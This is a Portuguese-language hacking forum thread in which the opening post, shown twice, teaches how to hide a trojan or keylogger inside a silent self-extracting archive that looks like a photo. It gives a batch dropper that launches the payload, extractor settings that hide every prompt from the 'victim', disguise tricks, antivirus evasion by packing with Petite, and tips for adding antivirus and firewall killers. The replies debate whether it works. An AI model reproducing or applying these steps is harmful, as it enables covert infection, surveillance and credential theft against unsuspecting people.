Title: [Tutorial] Joiner "natural" e indetectável
Post by: mrx on 19 de September , 2006, 04:11:52 PM
Post by: mrx on 19 de September , 2006, 04:11:52 PM
Creio que gostem deste tutorial pois vou abordar um assunto que se torna cada dia mais difícil para nós fussadores: Joiners.
Pessoal como todos sabemos, não existem muitos joiners de licença pública nos quais podemos nos esbaldar sem a interferência de anti-vírus. Acompanhem meu ponto de vista: Não podemos usar programas hackers por causa dos anti-vírus serto? Então não usaremos!
Minha proposta é usarmos meios alternativos para os nossos fins, como esse tutorial que irei apresentar.. Não usaremos nenhuma ferramenta hacker, apenas o vírus ou o que se deseja juntar, mas somente o propriamente dito. Chega de enrolar e vamos ao tutorial:
==============
Ingredientes =D
==============
-Filzip (www.filzip.com (http://www.filzip.com))
-Petite (www.un4seen.com/petite/ (http://www.un4seen.com/petite/))
-Arquivo Batch (criaremos depois)
-Foto de preferêcia (chamaremos de FOTO.JPG)
-Trojan/Keylloger de preferrência (chamarei de server.exe)
=============
Filzip?? Hmm??
=============
Pessoal como eu avia dito anteriormente, não usaremos ferramentas hackers, o Filzip server para compactarmos e descompactarmos arquivos em vários formatos, entre eles .CAB, .TAR, .tar.gz entre muitos outros. Mas não será esse o princípio de utilização. Usaremos a opção de gerar arquivos auto-extraíveis no formato .EXE. Entendamos como um joiner funciona:
-O joiner pega o código dos arquivos a serem juntados
-Após isso ele os envolve em seu código fonte (como uma sacola, lá dentro eles estão separados)
-Quando executado, o joiner manda os arquivos que estão lá dentro para a pasta temporária de seu computador (C:/Windows/TEMP) e manda um comando para executálos.
-Em seguida os arquivos que foram copiados para a pasta TEMP são apagados.
Adivinha o que a função de gerar arquivos auto-extraíveis do Filzip faz? Isso mesmo! Podemos conciderar o filzip como um joiner faltando opções.
==========
Petite
==========
O nosso velho amigo petite. Ele serve para compactar arquivos .EXE mudando seu código. Se ele muda o código verdadeiro, o anti-vírus não achará nada.
===============
Hey Ho! Let's Go!
===============
Pessoal antes de tudo lembrem-se de desativar seus anti-vírus (se forem mecher com algo que eles peguem, é claro). Instale o Filzip e descompacte o Petite na sua pasta do windows (normalmente C:\WINDOWS).
Após feito isso iremos fazer um arquivo BATCH, irei explicar o por que depois.
Abra o bloco de notas e digite:
@ECHO OFF
START /max C:\WINDOWS\FOTO.JPG
START /m C:\WINDOWS\SERVER.EXE
EXIT
Salve esse arquivo com o nome INSERT.BAT.
Após todo essse processo, crie um arquivo zipado com o Filzip e adicione lá dentro:
-FOTO.JPG
-SERVER.EXE
-INSERT.BAT
Feito isso, note o botão AÇÕES lá em sima da janela do Filzip, Clieque-o, e dessa até GERAR ARQUIVO .EXE, clique.
Em seguida irá abrir uma janela com as opções para gerar o arquivo auto-extraível, irei mostrar o que marcar e desmacar dando uma explicação do por que logo abaixo.
Mude DESTINO para C:\WINDOWS
=> Isso fará com que os arquívos sejam extraídos nesta pasta, para os comandos do arquivo Batch que criamos acharem os arquivos também.
Mude o TÍTULO DA APLICAÇÃO para picture0001
=> Apenas uma engenharia social básica =D
Acrecente em LINHA DE COMANDO o seguinte: C:\WINDOWS\INSERT.BAT
=> Com isso, logo após os arquivos serem extraídos esse comando irá rodar, fazendo com que o aqruivo que criamos abra, concequentemente rodando os comandos que estão apontados dentro do aqruivo BAT, abrindo a FOTO.JPG e o arquivo SERVER.EXE
Mude ARQUIVOS EXITENTES para SEMPRE SOBRESCREVER.
=> Assim o usuário não receberá a mensagem chata dizendo "Você deseja substituir os arquivos existentes?". Provavelmente alertando a vítima.
Em CONFIGURAÇÕES DO AUTO EXTRATOR desmarque as opções MOSTRAR OPÇÕES DE SOBRESCREVER e MOSTRAR LISTA DE ARQUIVOS. Após marque a opção NÃO PERGUNTAR ANTES DE EXTRAÍR.
=> Assim eliminamos a possibilidade da vítima ter que clicar em alguma pergunta do tipo SIM ou NÃO, botando em risco a funcionabilidade do plano.
Clique em OK.
Pronto, agora ele está totalmente em "estado automático", basta clicar para que ele estráia os arquivos, rode o batch e rode a foto e o server... Há um porém, o anti-vírus pode "ver" o que tem dentro deste pacote. Ai entra o petite =D
Vou aceitar a ipótese de que o arquivo que você acabou de criar se chame Picture.exe e está localizado na área de trabalho.
Abra seu prompt (tela principal do MS-DOS) e digite:
PETITE C:\WINDOWS\DESKTOP\PICTURE.EXE
Pronto pessoal, o anti-vírus não pode mais "ver" o conteúdo..
Espero que aproveitem esse tutorial feito com muita dedicação e imaginação. E lembrem-se: Procure SOFTWARES para o que você quer e não HACKER TOOLS...
===============
PONTOS A DECLARAR
===============
-Alguns ati-vírus podem identificar o petite como um hacker tool, mais são raros.
-Ah sim! O ícone chato que ficou? http:www.shelllabs.com/icon_changer.htm ele muda qualquer ícone =D
-Após os arquivos serem extraídos o anti-vírus pode pegar... Aconcelho camuflar ele usando um packing ou um crypting...
-Por que não usar o Winrar? Sem sucesso na hora de comprimir com o petite.
-Aconcelho não deletar mais o Filzip pois, na minha opinião, ele é o melhor do compressor que existe (freeware), até mesmo melhor que o popular WinRar... Utilizo ele com frequência.
-Para a vítima não estranhar o MS-DOS abrindo e fechando, ponha um jogo pequeno no lugar da foto, diga que foi de sua autoria e gostaria que testasse (imaginação).
-Você pode anexar mais arquivos como um AV-Killer, ou um Firewall-Killer.. Só não esqueça de acrescentá-los no arquivo Bath!
CREDITOS: tripbr
Pessoal como todos sabemos, não existem muitos joiners de licença pública nos quais podemos nos esbaldar sem a interferência de anti-vírus. Acompanhem meu ponto de vista: Não podemos usar programas hackers por causa dos anti-vírus serto? Então não usaremos!
Minha proposta é usarmos meios alternativos para os nossos fins, como esse tutorial que irei apresentar.. Não usaremos nenhuma ferramenta hacker, apenas o vírus ou o que se deseja juntar, mas somente o propriamente dito. Chega de enrolar e vamos ao tutorial:
==============
Ingredientes =D
==============
-Filzip (www.filzip.com (http://www.filzip.com))
-Petite (www.un4seen.com/petite/ (http://www.un4seen.com/petite/))
-Arquivo Batch (criaremos depois)
-Foto de preferêcia (chamaremos de FOTO.JPG)
-Trojan/Keylloger de preferrência (chamarei de server.exe)
=============
Filzip?? Hmm??
=============
Pessoal como eu avia dito anteriormente, não usaremos ferramentas hackers, o Filzip server para compactarmos e descompactarmos arquivos em vários formatos, entre eles .CAB, .TAR, .tar.gz entre muitos outros. Mas não será esse o princípio de utilização. Usaremos a opção de gerar arquivos auto-extraíveis no formato .EXE. Entendamos como um joiner funciona:
-O joiner pega o código dos arquivos a serem juntados
-Após isso ele os envolve em seu código fonte (como uma sacola, lá dentro eles estão separados)
-Quando executado, o joiner manda os arquivos que estão lá dentro para a pasta temporária de seu computador (C:/Windows/TEMP) e manda um comando para executálos.
-Em seguida os arquivos que foram copiados para a pasta TEMP são apagados.
Adivinha o que a função de gerar arquivos auto-extraíveis do Filzip faz? Isso mesmo! Podemos conciderar o filzip como um joiner faltando opções.
==========
Petite
==========
O nosso velho amigo petite. Ele serve para compactar arquivos .EXE mudando seu código. Se ele muda o código verdadeiro, o anti-vírus não achará nada.
===============
Hey Ho! Let's Go!
===============
Pessoal antes de tudo lembrem-se de desativar seus anti-vírus (se forem mecher com algo que eles peguem, é claro). Instale o Filzip e descompacte o Petite na sua pasta do windows (normalmente C:\WINDOWS).
Após feito isso iremos fazer um arquivo BATCH, irei explicar o por que depois.
Abra o bloco de notas e digite:
@ECHO OFF
START /max C:\WINDOWS\FOTO.JPG
START /m C:\WINDOWS\SERVER.EXE
EXIT
Salve esse arquivo com o nome INSERT.BAT.
Após todo essse processo, crie um arquivo zipado com o Filzip e adicione lá dentro:
-FOTO.JPG
-SERVER.EXE
-INSERT.BAT
Feito isso, note o botão AÇÕES lá em sima da janela do Filzip, Clieque-o, e dessa até GERAR ARQUIVO .EXE, clique.
Em seguida irá abrir uma janela com as opções para gerar o arquivo auto-extraível, irei mostrar o que marcar e desmacar dando uma explicação do por que logo abaixo.
Mude DESTINO para C:\WINDOWS
=> Isso fará com que os arquívos sejam extraídos nesta pasta, para os comandos do arquivo Batch que criamos acharem os arquivos também.
Mude o TÍTULO DA APLICAÇÃO para picture0001
=> Apenas uma engenharia social básica =D
Acrecente em LINHA DE COMANDO o seguinte: C:\WINDOWS\INSERT.BAT
=> Com isso, logo após os arquivos serem extraídos esse comando irá rodar, fazendo com que o aqruivo que criamos abra, concequentemente rodando os comandos que estão apontados dentro do aqruivo BAT, abrindo a FOTO.JPG e o arquivo SERVER.EXE
Mude ARQUIVOS EXITENTES para SEMPRE SOBRESCREVER.
=> Assim o usuário não receberá a mensagem chata dizendo "Você deseja substituir os arquivos existentes?". Provavelmente alertando a vítima.
Em CONFIGURAÇÕES DO AUTO EXTRATOR desmarque as opções MOSTRAR OPÇÕES DE SOBRESCREVER e MOSTRAR LISTA DE ARQUIVOS. Após marque a opção NÃO PERGUNTAR ANTES DE EXTRAÍR.
=> Assim eliminamos a possibilidade da vítima ter que clicar em alguma pergunta do tipo SIM ou NÃO, botando em risco a funcionabilidade do plano.
Clique em OK.
Pronto, agora ele está totalmente em "estado automático", basta clicar para que ele estráia os arquivos, rode o batch e rode a foto e o server... Há um porém, o anti-vírus pode "ver" o que tem dentro deste pacote. Ai entra o petite =D
Vou aceitar a ipótese de que o arquivo que você acabou de criar se chame Picture.exe e está localizado na área de trabalho.
Abra seu prompt (tela principal do MS-DOS) e digite:
PETITE C:\WINDOWS\DESKTOP\PICTURE.EXE
Pronto pessoal, o anti-vírus não pode mais "ver" o conteúdo..
Espero que aproveitem esse tutorial feito com muita dedicação e imaginação. E lembrem-se: Procure SOFTWARES para o que você quer e não HACKER TOOLS...
===============
PONTOS A DECLARAR
===============
-Alguns ati-vírus podem identificar o petite como um hacker tool, mais são raros.
-Ah sim! O ícone chato que ficou? http:www.shelllabs.com/icon_changer.htm ele muda qualquer ícone =D
-Após os arquivos serem extraídos o anti-vírus pode pegar... Aconcelho camuflar ele usando um packing ou um crypting...
-Por que não usar o Winrar? Sem sucesso na hora de comprimir com o petite.
-Aconcelho não deletar mais o Filzip pois, na minha opinião, ele é o melhor do compressor que existe (freeware), até mesmo melhor que o popular WinRar... Utilizo ele com frequência.
-Para a vítima não estranhar o MS-DOS abrindo e fechando, ponha um jogo pequeno no lugar da foto, diga que foi de sua autoria e gostaria que testasse (imaginação).
-Você pode anexar mais arquivos como um AV-Killer, ou um Firewall-Killer.. Só não esqueça de acrescentá-los no arquivo Bath!
CREDITOS: tripbr
Title: Re: [Tutorial] Joiner "natural" e indetectável
Post by: Anonymous on 19 de September , 2006, 04:51:54 PM
Post by: Anonymous on 19 de September , 2006, 04:51:54 PM
Muito bom tutorial :o
Title: Re: [Tutorial] Joiner "natural" e indetectável
Post by: Anonymous on 25 de September , 2006, 06:41:31 PM
Post by: Anonymous on 25 de September , 2006, 06:41:31 PM
:-\
Title: Re: [Tutorial] Joiner "natural" e indetectável
Post by: _Dr4k0_ on 25 de September , 2006, 06:46:52 PM
Post by: _Dr4k0_ on 25 de September , 2006, 06:46:52 PM
Quote from: "Bolo":-\
Funciona normalmente..Se não o que adiantaria ter um joiner se ele fizesse o programa parar de funcionar..
e
Quote from: "Bolo"Muito bom tutorial :o
Vamos deixar desses tipos de comentários que não ajudam em nada o tópico..normalmente em user's veteranos os moderas mandam -1
Title: Re: [Tutorial] Joiner "natural" e indetectável
Post by: #phobia on 25 de September , 2006, 07:08:44 PM
Post by: #phobia on 25 de September , 2006, 07:08:44 PM
Testei aqui e não funcionou após passar pelo Petite.
Title: Re: [Tutorial] Joiner "natural" e indetectável
Post by: _Dr4k0_ on 25 de September , 2006, 07:16:07 PM
Post by: _Dr4k0_ on 25 de September , 2006, 07:16:07 PM
Quote from: "DarkShadow"Testei aqui e não funcionou após passar pelo Petite.
Mais voce tem certeza que fez da maneira certinha?Pq se ele deixar de funcionar ele perde a "funcionalidade" que é esconder do AV e continuar funcionando..Que se for pra não funcionar é mais facil enviar qualquer arquivo
Vou fazer uns testes aqui no VMWare e logo posto as respostas
Title: Re: [Tutorial] Joiner "natural" e indetectável
Post by: mrx on 01 de October , 2006, 09:50:43 PM
Post by: mrx on 01 de October , 2006, 09:50:43 PM
Ae pessoal, blz??
Olha, Aqui Funcionou..
Olha, Aqui Funcionou..